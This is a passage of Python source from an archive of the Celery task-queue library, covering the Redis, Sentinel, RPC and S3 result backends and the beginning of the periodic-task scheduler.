'max_connections': self.max_connections, 'socket_timeout': socket_timeout and float(socket_timeout), 'retry_on_timeout': retry_on_timeout or False, 'socket_connect_timeout': socket_connect_timeout and float(socket_connect_timeout), } username = _get('redis_username') if username: # We're extra careful to avoid including this configuration value # if it wasn't specified since older versions of py-redis # don't support specifying a username. # Only Redis>6.0 supports username/password authentication. # TODO: Include this in connparams' definition once we drop # support for py-redis<3.4.0. self.connparams['username'] = username if health_check_interval: self.connparams["health_check_interval"] = health_check_interval # absent in redis.connection.UnixDomainSocketConnection if socket_keepalive: self.connparams['socket_keepalive'] = socket_keepalive # "redis_backend_use_ssl" must be a dict with the keys: # 'ssl_cert_reqs', 'ssl_ca_certs', 'ssl_certfile', 'ssl_keyfile' # (the same as "broker_use_ssl") ssl = _get('redis_backend_use_ssl') if ssl: self.connparams.update(ssl) self.connparams['connection_class'] = self.connection_class_ssl if url: self.connparams = self._params_from_url(url, self.connparams) # If we've received SSL parameters via query string or the # redis_backend_use_ssl dict, check ssl_cert_reqs is valid. 
If set # via query string ssl_cert_reqs will be a string so convert it here if ('connection_class' in self.connparams and issubclass(self.connparams['connection_class'], redis.SSLConnection)): ssl_cert_reqs_missing = 'MISSING' ssl_string_to_constant = {'CERT_REQUIRED': CERT_REQUIRED, 'CERT_OPTIONAL': CERT_OPTIONAL, 'CERT_NONE': CERT_NONE, 'required': CERT_REQUIRED, 'optional': CERT_OPTIONAL, 'none': CERT_NONE} ssl_cert_reqs = self.connparams.get('ssl_cert_reqs', ssl_cert_reqs_missing) ssl_cert_reqs = ssl_string_to_constant.get(ssl_cert_reqs, ssl_cert_reqs) if ssl_cert_reqs not in ssl_string_to_constant.values(): raise ValueError(E_REDIS_SSL_CERT_REQS_MISSING_INVALID) if ssl_cert_reqs == CERT_OPTIONAL: logger.warning(W_REDIS_SSL_CERT_OPTIONAL) elif ssl_cert_reqs == CERT_NONE: logger.warning(W_REDIS_SSL_CERT_NONE) self.connparams['ssl_cert_reqs'] = ssl_cert_reqs self.url = url self.connection_errors, self.channel_errors = ( get_redis_error_classes() if get_redis_error_classes else ((), ())) self.result_consumer = self.ResultConsumer( self, self.app, self.accept, self._pending_results, self._pending_messages, ) def _params_from_url(self, url, defaults): scheme, host, port, username, password, path, query = _parse_url(url) connparams = dict( defaults, **dictfilter({ 'host': host, 'port': port, 'username': username, 'password': password, 'db': query.pop('virtual_host', None)}) ) if scheme == 'socket': # use 'path' as path to the socket… in this case # the database number should be given in 'query' connparams.update({ 'connection_class': self.redis.UnixDomainSocketConnection, 'path': '/' + path, }) # host+port are invalid options when using this connection type. connparams.pop('host', None) connparams.pop('port', None) connparams.pop('socket_connect_timeout') else: connparams['db'] = path ssl_param_keys = ['ssl_ca_certs', 'ssl_certfile', 'ssl_keyfile', 'ssl_cert_reqs'] if scheme == 'redis': # If connparams or query string contain ssl params, raise error if (any(key in connparams for key in ssl_param_keys) or any(key in query for key in ssl_param_keys)): raise ValueError(E_REDIS_SSL_PARAMS_AND_SCHEME_MISMATCH) if scheme == 'rediss': connparams['connection_class'] = redis.SSLConnection # The following parameters, if present in the URL, are encoded. We # must add the decoded values to connparams. for ssl_setting in ssl_param_keys: ssl_val = query.pop(ssl_setting, None) if ssl_val: connparams[ssl_setting] = unquote(ssl_val) # db may be string and start with / like in kombu. 
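# Illustrative note added by the editor (not part of the original source):
# for a URL such as 'redis://:secret@localhost:6379/2' (hypothetical values)
# the path yields db '2', which is stripped and converted below so that
# connparams['db'] == 2.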
db = connparams.get('db') or 0 db = db.strip('/') if isinstance(db, str) else db connparams['db'] = int(db) for key, value in query.items(): if key in redis.connection.URL_QUERY_ARGUMENT_PARSERS: query[key] = redis.connection.URL_QUERY_ARGUMENT_PARSERS[key]( value ) # Query parameters override other parameters connparams.update(query) return connparams @cached_property def retry_policy(self): retry_policy = super().retry_policy if "retry_policy" in self._transport_options: retry_policy = retry_policy.copy() retry_policy.update(self._transport_options['retry_policy']) return retry_policy def on_task_call(self, producer, task_id): if not task_join_will_block(): self.result_consumer.consume_from(task_id) def get(self, key): return self.client.get(key) def mget(self, keys): return self.client.mget(keys) def ensure(self, fun, args, **policy): retry_policy = dict(self.retry_policy, **policy) max_retries = retry_policy.get('max_retries') return retry_over_time( fun, self.connection_errors, args, {}, partial(self.on_connection_error, max_retries), **retry_policy) def on_connection_error(self, max_retries, exc, intervals, retries): tts = next(intervals) logger.error( E_LOST.strip(), retries, max_retries or 'Inf', humanize_seconds(tts, 'in ')) return tts def set(self, key, value, **retry_policy): if isinstance(value, str) and len(value) > self._MAX_STR_VALUE_SIZE: raise BackendStoreError('value too large for Redis backend') return self.ensure(self._set, (key, value), **retry_policy) def _set(self, key, value): with self.client.pipeline() as pipe: if self.expires: pipe.setex(key, self.expires, value) else: pipe.set(key, value) pipe.publish(key, value) pipe.execute() def forget(self, task_id): super().forget(task_id) self.result_consumer.cancel_for(task_id) def delete(self, key): self.client.delete(key) def incr(self, key): return self.client.incr(key) def expire(self, key, value): return self.client.expire(key, value) def add_to_chord(self, group_id, result): self.client.incr(self.get_key_for_group(group_id, '.t'), 1) def _unpack_chord_result(self, tup, decode, EXCEPTION_STATES=states.EXCEPTION_STATES, PROPAGATE_STATES=states.PROPAGATE_STATES): _, tid, state, retval = decode(tup) if state in EXCEPTION_STATES: retval = self.exception_to_python(retval) if state in PROPAGATE_STATES: raise ChordError(f'Dependency {tid} raised {retval!r}') return retval def set_chord_size(self, group_id, chord_size): self.set(self.get_key_for_group(group_id, '.s'), chord_size) def apply_chord(self, header_result_args, body, **kwargs): # If any of the child results of this chord are complex (ie. group # results themselves), we need to save `header_result` to ensure that # the expected structure is retained when we finish the chord and pass # the results onward to the body in `on_chord_part_return()`. We don't # do this is all cases to retain an optimisation in the common case # where a chord header is comprised of simple result objects. 
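# Illustrative note added by the editor (not part of the original source):
# a "complex" header is one whose child results include a GroupResult, e.g.
# chord([add.s(1, 1), group(add.s(i, i) for i in range(2))], body.s()) with
# hypothetical tasks; saving the header here lets on_chord_part_return()
# restore the nested structure before joining.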
if not isinstance(header_result_args[1], _regen): header_result = self.app.GroupResult(*header_result_args) if any(isinstance(nr, GroupResult) for nr in header_result.results): header_result.save(backend=self) @cached_property def _chord_zset(self): return self._transport_options.get('result_chord_ordered', True) @cached_property def _transport_options(self): return self.app.conf.get('result_backend_transport_options', {}) def on_chord_part_return(self, request, state, result, propagate=None, **kwargs): app = self.app tid, gid, group_index = request.id, request.group, request.group_index if not gid or not tid: return if group_index is None: group_index = '+inf' client = self.client jkey = self.get_key_for_group(gid, '.j') tkey = self.get_key_for_group(gid, '.t') skey = self.get_key_for_group(gid, '.s') result = self.encode_result(result, state) encoded = self.encode([1, tid, state, result]) with client.pipeline() as pipe: pipeline = ( pipe.zadd(jkey, {encoded: group_index}).zcount(jkey, "-inf", "+inf") if self._chord_zset else pipe.rpush(jkey, encoded).llen(jkey) ).get(tkey).get(skey) if self.expires: pipeline = pipeline \ .expire(jkey, self.expires) \ .expire(tkey, self.expires) \ .expire(skey, self.expires) _, readycount, totaldiff, chord_size_bytes = pipeline.execute()[:4] totaldiff = int(totaldiff or 0) if chord_size_bytes: try: callback = maybe_signature(request.chord, app=app) total = int(chord_size_bytes) + totaldiff if readycount == total: header_result = GroupResult.restore(gid) if header_result is not None: # If we manage to restore a `GroupResult`, then it must # have been complex and saved by `apply_chord()` earlier. # # Before we can join the `GroupResult`, it needs to be # manually marked as ready to avoid blocking header_result.on_ready() # We'll `join()` it to get the results and ensure they are # structured as intended rather than the flattened version # we'd construct without any other information. join_func = ( header_result.join_native if header_result.supports_native_join else header_result.join ) with allow_join_result(): resl = join_func( timeout=app.conf.result_chord_join_timeout, propagate=True ) else: # Otherwise simply extract and decode the results we # stashed along the way, which should be faster for large # numbers of simple results in the chord header. 
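# The ``_chord_zset`` property above (and the ZADD/RPUSH branch in ``on_chord_part_return``)
# is driven by a transport option.  Illustrative toggle, assuming a hypothetical app using the
# Redis result backend:
from celery import Celery

app = Celery('proj')
app.conf.result_backend = 'redis://localhost:6379/1'
app.conf.result_backend_transport_options = {
    # True (the default) keeps chord results in a sorted set keyed by group_index;
    # False falls back to the RPUSH/LLEN list layout.
    'result_chord_ordered': True,
}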
decode, unpack = self.decode, self._unpack_chord_result with client.pipeline() as pipe: if self._chord_zset: pipeline = pipe.zrange(jkey, 0, -1) else: pipeline = pipe.lrange(jkey, 0, total) resl, = pipeline.execute() resl = [unpack(tup, decode) for tup in resl] try: callback.delay(resl) except Exception as exc: # pylint: disable=broad-except logger.exception( 'Chord callback for %r raised: %r', request.group, exc) return self.chord_error_from_stack( callback, ChordError(f'Callback error: {exc!r}'), ) finally: with client.pipeline() as pipe: pipe \ .delete(jkey) \ .delete(tkey) \ .delete(skey) \ .execute() except ChordError as exc: logger.exception('Chord %r raised: %r', request.group, exc) return self.chord_error_from_stack(callback, exc) except Exception as exc: # pylint: disable=broad-except logger.exception('Chord %r raised: %r', request.group, exc) return self.chord_error_from_stack( callback, ChordError(f'Join error: {exc!r}'), ) def _create_client(self, **params): return self._get_client()( connection_pool=self._get_pool(**params), ) def _get_client(self): return self.redis.StrictRedis def _get_pool(self, **params): return self.ConnectionPool(**params) @property def ConnectionPool(self): if self._ConnectionPool is None: self._ConnectionPool = self.redis.ConnectionPool return self._ConnectionPool @cached_property def client(self): return self._create_client(**self.connparams) def __reduce__(self, args=(), kwargs=None): kwargs = {} if not kwargs else kwargs return super().__reduce__( (self.url,), {'expires': self.expires}, ) if getattr(redis, "sentinel", None): class SentinelManagedSSLConnection( redis.sentinel.SentinelManagedConnection, redis.SSLConnection): """Connect to a Redis server using Sentinel + TLS. Use Sentinel to identify which Redis server is the current master to connect to and when connecting to the Master server, use an SSL Connection. 
""" class SentinelBackend(RedisBackend): """Redis sentinel task result store.""" # URL looks like `sentinel://0.0.0.0:26347/3;sentinel://0.0.0.0:26348/3` _SERVER_URI_SEPARATOR = ";" sentinel = getattr(redis, "sentinel", None) connection_class_ssl = SentinelManagedSSLConnection if sentinel else None def __init__(self, *args, **kwargs): if self.sentinel is None: raise ImproperlyConfigured(E_REDIS_SENTINEL_MISSING.strip()) super().__init__(*args, **kwargs) def as_uri(self, include_password=False): """Return the server addresses as URIs, sanitizing the password or not.""" # Allow superclass to do work if we don't need to force sanitization if include_password: return super().as_uri( include_password=include_password, ) # Otherwise we need to ensure that all components get sanitized rather # by passing them one by one to the `kombu` helper uri_chunks = ( maybe_sanitize_url(chunk) for chunk in (self.url or "").split(self._SERVER_URI_SEPARATOR) ) # Similar to the superclass, strip the trailing slash from URIs with # all components empty other than the scheme return self._SERVER_URI_SEPARATOR.join( uri[:-1] if uri.endswith(":///") else uri for uri in uri_chunks ) def _params_from_url(self, url, defaults): chunks = url.split(self._SERVER_URI_SEPARATOR) connparams = dict(defaults, hosts=[]) for chunk in chunks: data = super()._params_from_url( url=chunk, defaults=defaults) connparams['hosts'].append(data) for param in ("host", "port", "db", "password"): connparams.pop(param) # Adding db/password in connparams to connect to the correct instance for param in ("db", "password"): if connparams['hosts'] and param in connparams['hosts'][0]: connparams[param] = connparams['hosts'][0].get(param) return connparams def _get_sentinel_instance(self, **params): connparams = params.copy() hosts = connparams.pop("hosts") min_other_sentinels = self._transport_options.get("min_other_sentinels", 0) sentinel_kwargs = self._transport_options.get("sentinel_kwargs", {}) sentinel_instance = self.sentinel.Sentinel( [(cp['host'], cp['port']) for cp in hosts], min_other_sentinels=min_other_sentinels, sentinel_kwargs=sentinel_kwargs, **connparams) return sentinel_instance def _get_pool(self, **params): sentinel_instance = self._get_sentinel_instance(**params) master_name = self._transport_options.get("master_name", None) return sentinel_instance.master_for( service_name=master_name, redis_class=self._get_client(), ).connection_pool ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/rpc.py0000664000175000017500000002745500000000000017105 0ustar00asifasif00000000000000"""The ``RPC`` result backend for AMQP brokers. RPC-style result backend, using reply-to and one queue per client. """ import time import kombu from kombu.common import maybe_declare from kombu.utils.compat import register_after_fork from kombu.utils.objects import cached_property from celery import states from celery._state import current_task, task_join_will_block from . import base from .asynchronous import AsyncBackendMixin, BaseResultConsumer __all__ = ('BacklogLimitExceeded', 'RPCBackend') E_NO_CHORD_SUPPORT = """ The "rpc" result backend does not support chords! Note that a group chained with a task is also upgraded to be a chord, as this pattern requires synchronization. Result backends that supports chords: Redis, Database, Memcached, and more. 
""" class BacklogLimitExceeded(Exception): """Too much state history to fast-forward.""" def _on_after_fork_cleanup_backend(backend): backend._after_fork() class ResultConsumer(BaseResultConsumer): Consumer = kombu.Consumer _connection = None _consumer = None def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self._create_binding = self.backend._create_binding def start(self, initial_task_id, no_ack=True, **kwargs): self._connection = self.app.connection() initial_queue = self._create_binding(initial_task_id) self._consumer = self.Consumer( self._connection.default_channel, [initial_queue], callbacks=[self.on_state_change], no_ack=no_ack, accept=self.accept) self._consumer.consume() def drain_events(self, timeout=None): if self._connection: return self._connection.drain_events(timeout=timeout) elif timeout: time.sleep(timeout) def stop(self): try: self._consumer.cancel() finally: self._connection.close() def on_after_fork(self): self._consumer = None if self._connection is not None: self._connection.collect() self._connection = None def consume_from(self, task_id): if self._consumer is None: return self.start(task_id) queue = self._create_binding(task_id) if not self._consumer.consuming_from(queue): self._consumer.add_queue(queue) self._consumer.consume() def cancel_for(self, task_id): if self._consumer: self._consumer.cancel_by_queue(self._create_binding(task_id).name) class RPCBackend(base.Backend, AsyncBackendMixin): """Base class for the RPC result backend.""" Exchange = kombu.Exchange Producer = kombu.Producer ResultConsumer = ResultConsumer #: Exception raised when there are too many messages for a task id. BacklogLimitExceeded = BacklogLimitExceeded persistent = False supports_autoexpire = True supports_native_join = True retry_policy = { 'max_retries': 20, 'interval_start': 0, 'interval_step': 1, 'interval_max': 1, } class Consumer(kombu.Consumer): """Consumer that requires manual declaration of queues.""" auto_declare = False class Queue(kombu.Queue): """Queue that never caches declaration.""" can_cache_declaration = False def __init__(self, app, connection=None, exchange=None, exchange_type=None, persistent=None, serializer=None, auto_delete=True, **kwargs): super().__init__(app, **kwargs) conf = self.app.conf self._connection = connection self._out_of_band = {} self.persistent = self.prepare_persistent(persistent) self.delivery_mode = 2 if self.persistent else 1 exchange = exchange or conf.result_exchange exchange_type = exchange_type or conf.result_exchange_type self.exchange = self._create_exchange( exchange, exchange_type, self.delivery_mode, ) self.serializer = serializer or conf.result_serializer self.auto_delete = auto_delete self.result_consumer = self.ResultConsumer( self, self.app, self.accept, self._pending_results, self._pending_messages, ) if register_after_fork is not None: register_after_fork(self, _on_after_fork_cleanup_backend) def _after_fork(self): # clear state for child processes. self._pending_results.clear() self.result_consumer._after_fork() def _create_exchange(self, name, type='direct', delivery_mode=2): # uses direct to queue routing (anon exchange). return self.Exchange(None) def _create_binding(self, task_id): """Create new binding for task with id.""" # RPC backend caches the binding, as one queue is used for all tasks. return self.binding def ensure_chords_allowed(self): raise NotImplementedError(E_NO_CHORD_SUPPORT.strip()) def on_task_call(self, producer, task_id): # Called every time a task is sent when using this backend. 
# We declare the queue we receive replies on in advance of sending # the message, but we skip this if running in the prefork pool # (task_join_will_block), as we know the queue is already declared. if not task_join_will_block(): maybe_declare(self.binding(producer.channel), retry=True) def destination_for(self, task_id, request): """Get the destination for result by task id. Returns: Tuple[str, str]: tuple of ``(reply_to, correlation_id)``. """ # Backends didn't always receive the `request`, so we must still # support old code that relies on current_task. try: request = request or current_task.request except AttributeError: raise RuntimeError( f'RPC backend missing task request for {task_id!r}') return request.reply_to, request.correlation_id or task_id def on_reply_declare(self, task_id): # Return value here is used as the `declare=` argument # for Producer.publish. # By default we don't have to declare anything when sending a result. pass def on_result_fulfilled(self, result): # This usually cancels the queue after the result is received, # but we don't have to cancel since we have one queue per process. pass def as_uri(self, include_password=True): return 'rpc://' def store_result(self, task_id, result, state, traceback=None, request=None, **kwargs): """Send task return value and state.""" routing_key, correlation_id = self.destination_for(task_id, request) if not routing_key: return with self.app.amqp.producer_pool.acquire(block=True) as producer: producer.publish( self._to_result(task_id, state, result, traceback, request), exchange=self.exchange, routing_key=routing_key, correlation_id=correlation_id, serializer=self.serializer, retry=True, retry_policy=self.retry_policy, declare=self.on_reply_declare(task_id), delivery_mode=self.delivery_mode, ) return result def _to_result(self, task_id, state, result, traceback, request): return { 'task_id': task_id, 'status': state, 'result': self.encode_result(result, state), 'traceback': traceback, 'children': self.current_task_children(request), } def on_out_of_band_result(self, task_id, message): # Callback called when a reply for a task is received, # but we have no idea what do do with it. # Since the result is not pending, we put it in a separate # buffer: probably it will become pending later. if self.result_consumer: self.result_consumer.on_out_of_band_result(message) self._out_of_band[task_id] = message def get_task_meta(self, task_id, backlog_limit=1000): buffered = self._out_of_band.pop(task_id, None) if buffered: return self._set_cache_by_message(task_id, buffered) # Polling and using basic_get latest_by_id = {} prev = None for acc in self._slurp_from_queue(task_id, self.accept, backlog_limit): tid = self._get_message_task_id(acc) prev, latest_by_id[tid] = latest_by_id.get(tid), acc if prev: # backends aren't expected to keep history, # so we delete everything except the most recent state. prev.ack() prev = None latest = latest_by_id.pop(task_id, None) for tid, msg in latest_by_id.items(): self.on_out_of_band_result(tid, msg) if latest: latest.requeue() return self._set_cache_by_message(task_id, latest) else: # no new state, use previous try: return self._cache[task_id] except KeyError: # result probably pending. 
return {'status': states.PENDING, 'result': None} poll = get_task_meta # XXX compat def _set_cache_by_message(self, task_id, message): payload = self._cache[task_id] = self.meta_from_decoded( message.payload) return payload def _slurp_from_queue(self, task_id, accept, limit=1000, no_ack=False): with self.app.pool.acquire_channel(block=True) as (_, channel): binding = self._create_binding(task_id)(channel) binding.declare() for _ in range(limit): msg = binding.get(accept=accept, no_ack=no_ack) if not msg: break yield msg else: raise self.BacklogLimitExceeded(task_id) def _get_message_task_id(self, message): try: # try property first so we don't have to deserialize # the payload. return message.properties['correlation_id'] except (AttributeError, KeyError): # message sent by old Celery version, need to deserialize. return message.payload['task_id'] def revive(self, channel): pass def reload_task_result(self, task_id): raise NotImplementedError( 'reload_task_result is not supported by this backend.') def reload_group_result(self, task_id): """Reload group result, even if it has been previously fetched.""" raise NotImplementedError( 'reload_group_result is not supported by this backend.') def save_group(self, group_id, result): raise NotImplementedError( 'save_group is not supported by this backend.') def restore_group(self, group_id, cache=True): raise NotImplementedError( 'restore_group is not supported by this backend.') def delete_group(self, group_id): raise NotImplementedError( 'delete_group is not supported by this backend.') def __reduce__(self, args=(), kwargs=None): kwargs = {} if not kwargs else kwargs return super().__reduce__(args, dict( kwargs, connection=self._connection, exchange=self.exchange.name, exchange_type=self.exchange.type, persistent=self.persistent, serializer=self.serializer, auto_delete=self.auto_delete, expires=self.expires, )) @property def binding(self): return self.Queue( self.oid, self.exchange, self.oid, durable=False, auto_delete=True, expires=self.expires, ) @cached_property def oid(self): # cached here is the app thread OID: name of queue we receive results on. return self.app.thread_oid ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/s3.py0000664000175000017500000000530000000000000016627 0ustar00asifasif00000000000000"""s3 result store backend.""" from kombu.utils.encoding import bytes_to_str from celery.exceptions import ImproperlyConfigured from .base import KeyValueStoreBackend try: import boto3 import botocore except ImportError: boto3 = None botocore = None __all__ = ('S3Backend',) class S3Backend(KeyValueStoreBackend): """An S3 task result store. Raises: celery.exceptions.ImproperlyConfigured: if module :pypi:`boto3` is not available, if the :setting:`aws_access_key_id` or setting:`aws_secret_access_key` are not set, or it the :setting:`bucket` is not set. 
""" def __init__(self, **kwargs): super().__init__(**kwargs) if not boto3 or not botocore: raise ImproperlyConfigured('You must install boto3' 'to use s3 backend') conf = self.app.conf self.endpoint_url = conf.get('s3_endpoint_url', None) self.aws_region = conf.get('s3_region', None) self.aws_access_key_id = conf.get('s3_access_key_id', None) self.aws_secret_access_key = conf.get('s3_secret_access_key', None) self.bucket_name = conf.get('s3_bucket', None) if not self.bucket_name: raise ImproperlyConfigured('Missing bucket name') self.base_path = conf.get('s3_base_path', None) self._s3_resource = self._connect_to_s3() def _get_s3_object(self, key): key_bucket_path = self.base_path + key if self.base_path else key return self._s3_resource.Object(self.bucket_name, key_bucket_path) def get(self, key): key = bytes_to_str(key) s3_object = self._get_s3_object(key) try: s3_object.load() data = s3_object.get()['Body'].read() return data if self.content_encoding == 'binary' else data.decode('utf-8') except botocore.exceptions.ClientError as error: if error.response['Error']['Code'] == "404": return None raise error def set(self, key, value): key = bytes_to_str(key) s3_object = self._get_s3_object(key) s3_object.put(Body=value) def delete(self, key): key = bytes_to_str(key) s3_object = self._get_s3_object(key) s3_object.delete() def _connect_to_s3(self): session = boto3.Session( aws_access_key_id=self.aws_access_key_id, aws_secret_access_key=self.aws_secret_access_key, region_name=self.aws_region ) if session.get_credentials() is None: raise ImproperlyConfigured('Missing aws s3 creds') return session.resource('s3', endpoint_url=self.endpoint_url) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/beat.py0000664000175000017500000005753500000000000015464 0ustar00asifasif00000000000000"""The periodic task scheduler.""" import copy import errno import heapq import os import shelve import sys import time import traceback from calendar import timegm from collections import namedtuple from functools import total_ordering from threading import Event, Thread from billiard import ensure_multiprocessing from billiard.common import reset_signals from billiard.context import Process from kombu.utils.functional import maybe_evaluate, reprcall from kombu.utils.objects import cached_property from . import __version__, platforms, signals from .exceptions import reraise from .schedules import crontab, maybe_schedule from .utils.imports import load_extension_class_names, symbol_by_name from .utils.log import get_logger, iter_open_logger_fds from .utils.time import humanize_seconds, maybe_make_aware __all__ = ( 'SchedulingError', 'ScheduleEntry', 'Scheduler', 'PersistentScheduler', 'Service', 'EmbeddedService', ) event_t = namedtuple('event_t', ('time', 'priority', 'entry')) logger = get_logger(__name__) debug, info, error, warning = (logger.debug, logger.info, logger.error, logger.warning) DEFAULT_MAX_INTERVAL = 300 # 5 minutes class SchedulingError(Exception): """An error occurred while scheduling a task.""" class BeatLazyFunc: """An lazy function declared in 'beat_schedule' and called before sending to worker. 
Example: beat_schedule = { 'test-every-5-minutes': { 'task': 'test', 'schedule': 300, 'kwargs': { "current": BeatCallBack(datetime.datetime.now) } } } """ def __init__(self, func, *args, **kwargs): self._func = func self._func_params = { "args": args, "kwargs": kwargs } def __call__(self): return self.delay() def delay(self): return self._func(*self._func_params["args"], **self._func_params["kwargs"]) @total_ordering class ScheduleEntry: """An entry in the scheduler. Arguments: name (str): see :attr:`name`. schedule (~celery.schedules.schedule): see :attr:`schedule`. args (Tuple): see :attr:`args`. kwargs (Dict): see :attr:`kwargs`. options (Dict): see :attr:`options`. last_run_at (~datetime.datetime): see :attr:`last_run_at`. total_run_count (int): see :attr:`total_run_count`. relative (bool): Is the time relative to when the server starts? """ #: The task name name = None #: The schedule (:class:`~celery.schedules.schedule`) schedule = None #: Positional arguments to apply. args = None #: Keyword arguments to apply. kwargs = None #: Task execution options. options = None #: The time and date of when this task was last scheduled. last_run_at = None #: Total number of times this task has been scheduled. total_run_count = 0 def __init__(self, name=None, task=None, last_run_at=None, total_run_count=None, schedule=None, args=(), kwargs=None, options=None, relative=False, app=None): self.app = app self.name = name self.task = task self.args = args self.kwargs = kwargs if kwargs else {} self.options = options if options else {} self.schedule = maybe_schedule(schedule, relative, app=self.app) self.last_run_at = last_run_at or self.default_now() self.total_run_count = total_run_count or 0 def default_now(self): return self.schedule.now() if self.schedule else self.app.now() _default_now = default_now # compat def _next_instance(self, last_run_at=None): """Return new instance, with date and count fields updated.""" return self.__class__(**dict( self, last_run_at=last_run_at or self.default_now(), total_run_count=self.total_run_count + 1, )) __next__ = next = _next_instance # for 2to3 def __reduce__(self): return self.__class__, ( self.name, self.task, self.last_run_at, self.total_run_count, self.schedule, self.args, self.kwargs, self.options, ) def update(self, other): """Update values from another entry. Will only update "editable" fields: ``task``, ``schedule``, ``args``, ``kwargs``, ``options``. """ self.__dict__.update({ 'task': other.task, 'schedule': other.schedule, 'args': other.args, 'kwargs': other.kwargs, 'options': other.options, }) def is_due(self): """See :meth:`~celery.schedule.schedule.is_due`.""" return self.schedule.is_due(self.last_run_at) def __iter__(self): return iter(vars(self).items()) def __repr__(self): return '<{name}: {0.name} {call} {0.schedule}'.format( self, call=reprcall(self.task, self.args or (), self.kwargs or {}), name=type(self).__name__, ) def __lt__(self, other): if isinstance(other, ScheduleEntry): # How the object is ordered doesn't really matter, as # in the scheduler heap, the order is decided by the # preceding members of the tuple ``(time, priority, entry)``. # # If all that's left to order on is the entry then it can # just as well be random. return id(self) < id(other) return NotImplemented def editable_fields_equal(self, other): for attr in ('task', 'args', 'kwargs', 'options', 'schedule'): if getattr(self, attr) != getattr(other, attr): return False return True def __eq__(self, other): """Test schedule entries equality. 
Will only compare "editable" fields: ``task``, ``schedule``, ``args``, ``kwargs``, ``options``. """ return self.editable_fields_equal(other) def __ne__(self, other): """Test schedule entries inequality. Will only compare "editable" fields: ``task``, ``schedule``, ``args``, ``kwargs``, ``options``. """ return not self == other def _evaluate_entry_args(entry_args): if not entry_args: return [] return [ v() if isinstance(v, BeatLazyFunc) else v for v in entry_args ] def _evaluate_entry_kwargs(entry_kwargs): if not entry_kwargs: return {} return { k: v() if isinstance(v, BeatLazyFunc) else v for k, v in entry_kwargs.items() } class Scheduler: """Scheduler for periodic tasks. The :program:`celery beat` program may instantiate this class multiple times for introspection purposes, but then with the ``lazy`` argument set. It's important for subclasses to be idempotent when this argument is set. Arguments: schedule (~celery.schedules.schedule): see :attr:`schedule`. max_interval (int): see :attr:`max_interval`. lazy (bool): Don't set up the schedule. """ Entry = ScheduleEntry #: The schedule dict/shelve. schedule = None #: Maximum time to sleep between re-checking the schedule. max_interval = DEFAULT_MAX_INTERVAL #: How often to sync the schedule (3 minutes by default) sync_every = 3 * 60 #: How many tasks can be called before a sync is forced. sync_every_tasks = None _last_sync = None _tasks_since_sync = 0 logger = logger # compat def __init__(self, app, schedule=None, max_interval=None, Producer=None, lazy=False, sync_every_tasks=None, **kwargs): self.app = app self.data = maybe_evaluate({} if schedule is None else schedule) self.max_interval = (max_interval or app.conf.beat_max_loop_interval or self.max_interval) self.Producer = Producer or app.amqp.Producer self._heap = None self.old_schedulers = None self.sync_every_tasks = ( app.conf.beat_sync_every if sync_every_tasks is None else sync_every_tasks) if not lazy: self.setup_schedule() def install_default_entries(self, data): entries = {} if self.app.conf.result_expires and \ not self.app.backend.supports_autoexpire: if 'celery.backend_cleanup' not in data: entries['celery.backend_cleanup'] = { 'task': 'celery.backend_cleanup', 'schedule': crontab('0', '4', '*'), 'options': {'expires': 12 * 3600}} self.update_from_dict(entries) def apply_entry(self, entry, producer=None): info('Scheduler: Sending due task %s (%s)', entry.name, entry.task) try: result = self.apply_async(entry, producer=producer, advance=False) except Exception as exc: # pylint: disable=broad-except error('Message Error: %s\n%s', exc, traceback.format_stack(), exc_info=True) else: debug('%s sent. 
id->%s', entry.task, result.id) def adjust(self, n, drift=-0.010): if n and n > 0: return n + drift return n def is_due(self, entry): return entry.is_due() def _when(self, entry, next_time_to_run, mktime=timegm): """Return a utc timestamp, make sure heapq is in correct order.""" adjust = self.adjust as_now = maybe_make_aware(entry.default_now()) return (mktime(as_now.utctimetuple()) + as_now.microsecond / 1e6 + (adjust(next_time_to_run) or 0)) def populate_heap(self, event_t=event_t, heapify=heapq.heapify): """Populate the heap with the data contained in the schedule.""" priority = 5 self._heap = [] for entry in self.schedule.values(): is_due, next_call_delay = entry.is_due() self._heap.append(event_t( self._when( entry, 0 if is_due else next_call_delay ) or 0, priority, entry )) heapify(self._heap) # pylint: disable=redefined-outer-name def tick(self, event_t=event_t, min=min, heappop=heapq.heappop, heappush=heapq.heappush): """Run a tick - one iteration of the scheduler. Executes one due task per call. Returns: float: preferred delay in seconds for next call. """ adjust = self.adjust max_interval = self.max_interval if (self._heap is None or not self.schedules_equal(self.old_schedulers, self.schedule)): self.old_schedulers = copy.copy(self.schedule) self.populate_heap() H = self._heap if not H: return max_interval event = H[0] entry = event[2] is_due, next_time_to_run = self.is_due(entry) if is_due: verify = heappop(H) if verify is event: next_entry = self.reserve(entry) self.apply_entry(entry, producer=self.producer) heappush(H, event_t(self._when(next_entry, next_time_to_run), event[1], next_entry)) return 0 else: heappush(H, verify) return min(verify[0], max_interval) return min(adjust(next_time_to_run) or max_interval, max_interval) def schedules_equal(self, old_schedules, new_schedules): if old_schedules is new_schedules is None: return True if old_schedules is None or new_schedules is None: return False if set(old_schedules.keys()) != set(new_schedules.keys()): return False for name, old_entry in old_schedules.items(): new_entry = new_schedules.get(name) if not new_entry: return False if new_entry != old_entry: return False return True def should_sync(self): return ( (not self._last_sync or (time.monotonic() - self._last_sync) > self.sync_every) or (self.sync_every_tasks and self._tasks_since_sync >= self.sync_every_tasks) ) def reserve(self, entry): new_entry = self.schedule[entry.name] = next(entry) return new_entry def apply_async(self, entry, producer=None, advance=True, **kwargs): # Update time-stamps and run counts before we actually execute, # so we have that done if an exception is raised (doesn't schedule # forever.) 
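# The scheduler above consumes entries built from ``beat_schedule``; a small illustrative
# configuration (the task names and timings are placeholders, not taken from this repository):
from celery import Celery
from celery.schedules import crontab

app = Celery('proj')
app.conf.beat_schedule = {
    'add-every-30-seconds': {
        'task': 'proj.tasks.add',          # hypothetical task name
        'schedule': 30.0,                  # seconds between runs
        'args': (16, 16),
    },
    'nightly-cleanup': {
        'task': 'proj.tasks.cleanup',      # hypothetical task name
        'schedule': crontab(hour=4, minute=0),
        'options': {'expires': 3600},
    },
}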
